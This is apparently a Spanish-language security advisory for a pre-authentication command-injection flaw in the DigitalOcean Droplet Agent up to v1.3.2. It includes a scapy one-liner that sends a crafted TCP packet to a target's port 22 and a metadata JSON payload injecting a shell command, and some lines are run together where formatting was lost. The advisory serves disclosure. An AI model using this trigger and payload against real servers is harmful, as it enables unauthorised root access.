
Vulnerabilidad crítica de RCE pre-autenticación (CVSS 10.0) en DigitalOcean Droplet Agent hasta v1.3.2 mediante inyección de comandos.
RCE crítico de root sin autenticación (CVSS 10.0) en el Agente Droplet de DigitalOcean hasta v1.3.2 mediante inyección de comandos.
Se descubrió una vulnerabilidad crítica de inyección de comandos en el Agente Droplet de DigitalOcean (todas las versiones hasta la 1.3.2 inclusive). Esta falla permite a un atacante lograr Ejecución Remota de Código (RCE) con privilegios de root sin necesidad de autenticación.
Descubridor: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research
La vulnerabilidad existe en el componente de acciones de solución de problemas:
internal/troubleshooting/actioner/actioner.gointernal/troubleshooting/command/exec.goEl agente procesa metadatos del servicio local () y ejecuta comandos del array sin una sanitización adecuada.
169.254.169.254TroubleshootingAgent.RequestingEl agente se activa mediante un paquete TCP específico al puerto 22:
Activar la obtención:
python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"
Payload de Metadatos Maliciosos:
{
"troubleshooting_agent": {
"requesting": ["command:id > /tmp/pwned"]
}
}
Impacto Puntuación CVSS: 10.0 (Crítico)
Privilegios Requeridos: Ninguno
Resultado: Compromiso Total del Sistema (Acceso Root)
